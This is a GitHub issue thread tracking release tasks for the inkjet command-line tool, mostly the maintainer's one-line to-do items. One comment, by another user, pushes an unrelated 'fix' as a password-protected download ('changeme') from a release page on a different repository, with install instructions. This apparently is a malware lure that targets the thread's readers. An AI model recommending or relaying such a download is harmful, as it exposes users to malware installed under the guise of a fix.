### ISSUE TITLE
Prepare for 1.0

### ISSUE THREAD

**Issue by brandonkal** [brandonkal/inkjet#3]
Implemented

**Comment by dionathanfreitas** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by brandonkal** [comment]
Also error if interpreter is missing

**Comment by brandonkal** [comment]
Also handle no blank line after description

**Comment by brandonkal** [comment]
Should error for duplicate aliases

**Comment by brandonkal** [comment]
should error if merged h1 contains spaces (because it creates an unexpected command)

**Comment by brandonkal** [comment]
Deno arg

**Comment by brandonkal** [comment]
More verbose error messages

**Comment by brandonkal** [comment]
Audit comments

**Comment by brandonkal** [comment]
Inject info from first header into CLI help

**Comment by brandonkal** [comment]
Double dash interactive

**Comment by brandonkal** [comment]
Add copyright headers - Done

**Comment by brandonkal** [comment]
Add pre-commit with cargo fmt

**Comment by brandonkal** [comment]
Push to other remote

**Comment by brandonkal** [comment]
--inkjet-init command

**Comment by brandonkal** [comment]
changelog and docs

**Comment by brandonkal** [comment]
Required flags

**Comment by brandonkal** [comment]
Coverage

**Comment by brandonkal** [comment]
musl and Windows build

**Comment by brandonkal** [comment]
flag choices

**Comment by brandonkal** [comment]
add choices tests, windows tests

**Comment by brandonkal** [comment]
embed icon in windows build

**Comment by brandonkal** [comment]
Package for apt and brew-tap. Windows as 7zip
